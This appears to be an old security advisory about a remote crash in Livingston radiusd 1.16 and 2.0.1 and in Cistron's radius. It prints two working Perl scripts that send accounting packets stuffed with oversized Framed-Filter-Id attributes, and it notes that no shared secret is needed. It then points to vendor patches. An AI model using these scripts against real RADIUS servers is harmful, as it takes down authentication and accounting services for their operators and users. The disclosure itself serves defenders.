COMMAND

    radiusd

SYSTEMS AFFECTED

    Systems  running  radiusd  (livingston,  1.16  and  2.0.1 97/5/22,
    cistron's radius)

PROBLEM

    Hamdi Tounsi found  following.  The  following will crash  radiusd
    from livingston, 1.16 and 2.0.1  97/5/22.  One important thing  is
    that you dont need the shared secret between the radius server and
    its clients to  be able to  crash it, since  the accounting server
    will try to log the accounting request (though it will flag it  as
    unverified) of course you need to be listed in the clients  config
    file to be able to  send an accounting request (otherwise  spoof).
    Crash code follows:

    #!/usr/bin/perl
    use Authen::RadiusAcct;
    $r = new Authen::RadiusAcct(Host => 'your.radius.server:1646', Secret => 'any_string');
    $r->load_dictionary;
    $r->add_attributes(
            {Name => 'User-Name', Value => 'anyuser'},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
            );
    $r->send_packet(4);
    }

    Cistron's radius is also vulnerable to the radius crasher since it
    is derived from livingston's radius 1.16.  The code is simpler:

    #!/usr/bin/perl
    use Authen::RadiusAcct;
    $r = new Authen::RadiusAcct(Host => 'radiushost:1646', Secret => 'any_secret');
    $r->load_dictionary;
    $r->add_attributes(
            {Name => 'User-Name', Value => 'dummy'},
            {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A4096','A')},
            );

    $r->send_packet(4);
    }

SOLUTION

    A patch for RADIUS Server 2.0.1 is available and URL is:

        ftp://ftp.livingston.com/pub/le/radius/

    Note that people  running very old  versions of ComOS  that didn't
    sign accounting  packets will  need to  upgrade their  ComOS to at
    least release  3.3.1 before  applying this  patch to  their RADIUS
    server, if they want to keep using RADIUS Accounting.  There's  no
    patch for  RADIUS 1.16;  anyone who  owns a  Livingston PortMaster
    should upgrade to RADIUS 2.0.1 at:

        http://www.livingston.com/Forms/radiusform.cgi

    and then apply this patch.